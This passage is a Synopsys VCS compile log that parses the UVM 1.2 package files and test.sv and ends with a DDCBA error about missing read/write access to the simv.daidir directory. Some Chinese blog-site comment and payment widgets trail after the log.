to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_pkg.sv'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm2/uvm_tlm2.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm2/uvm_tlm2_defines.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm2/uvm_tlm2.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm2/uvm_tlm2_time.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm2/uvm_tlm2.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm2/uvm_tlm2_generic_payload.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm2/uvm_tlm2.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm2/uvm_tlm2_ifs.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm2/uvm_tlm2.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm2/uvm_tlm2_imps.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm2/uvm_tlm2.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm2/uvm_tlm2_ports.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm2/uvm_tlm2.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm2/uvm_tlm2_exports.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm2/uvm_tlm2.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm2/uvm_tlm2_sockets_base.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm2/uvm_tlm2.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm2/uvm_tlm2_sockets.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/tlm2/uvm_tlm2.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_pkg.sv'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_item.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_adapter.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_predictor.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_sequence.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_cbs.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_backdoor.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_field.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_vreg_field.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_indirect.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_fifo.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_file.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_mem_mam.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_vreg.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_mem.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_map.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_block.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/sequences/uvm_reg_hw_reset_seq.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/sequences/uvm_reg_bit_bash_seq.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/sequences/uvm_mem_walk_seq.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/sequences/uvm_mem_access_seq.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/sequences/uvm_reg_access_seq.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/sequences/uvm_reg_mem_shared_access_seq.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/sequences/uvm_reg_mem_built_in_seq.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/sequences/uvm_reg_mem_hdl_paths_seq.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Parsing included file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/snps_uvm_reg_bank.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/reg/uvm_reg_model.svh'. Back to file '/opt/synopsys/vcs-mx2018/O-2018.09-SP2/etc/uvm-1.2/uvm_pkg.sv'. Parsing design file 'test.sv' Top Level Modules: test No TimeScale specified Error-[DDCBA] Daidir cannot be accessed DaiDir directory "simv.daidir" does not have read/write access or is not a directory. Please check directory permissions. 1 error CPU time: 11.798 seconds to compile
最新发布
12-02
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值